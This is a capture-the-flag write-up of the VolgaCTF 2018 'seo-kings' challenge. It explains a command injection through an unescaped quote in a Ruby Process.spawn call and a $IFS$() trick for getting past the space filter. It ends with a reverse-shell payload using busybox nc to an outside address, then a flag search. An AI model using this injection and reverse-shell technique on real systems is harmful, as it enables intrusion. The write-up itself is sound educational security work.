Tags: command_injection 

Rating: 5.0

The site exposes SEO service which requests like this:

POST http://seo-kings.quals.2018.volgactf.ru:8080/ HTTP/1.1
Host: seo-kings.quals.2018.volgactf.ru:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

site=<my_url>

If an array is given as site parameter, like site[]=, the server emits an error:

NoMethodError at /
undefined method `gsub' for [""]:Array
file: rfc2396_parser.rb location: escape line: 305

And guess what? Some partial source code is revealed in the error message, and there is:

/opt/seo-kings/app/controllers/main_controller.rb in runAdmin
  pid = Process.spawn("phantomjs --web-security=no bot.js '" +  URI.escape(site)  + "'")
/opt/seo-kings/app/controllers/main_controller.rb in block in <class:MainController>
      runAdmin(site)

Look at pid = Process.spawn("phantomjs --web-security=no bot.js '" + URI.escape(site) + "'"). site is user input, and by URI.escape, '(0x27) is not escaped! So there is a command injection vulnerability.

Since all spaces including %20, %09-%0c and [], {} are escaped (and dollar sign is not escaped), I could use $IFS to make spaces in the command. Like, ls$IFS-al.

But if non-first arguments doesn't start with non-alphanumeric characters, it'll become like this:

nc 1.2.3.4 -> nc$IFS1.2.3.4 ?
$IFS1 is not defined, so it'll become nc .2.3.4.

Fortunately () is not escaped, so we can do like this:

nc$IFS$()1.2.3.4

$() is the output of empty command, which is zero-length character. It was used to separate IFS and other characters.

The final payload:

site=';busybox$IFS$()nc$IFS$()1.2.3.4$IFS$()10000$IFS$()-esh;'

After obtaining shell, I saw .bash_history in the user directory, which has this:

vi file_wiht_flag.rb

I ran find / -name file_wiht_flag.rb, and there was:

...
'VolgaCTF{hope_it_was_like_madness}'
...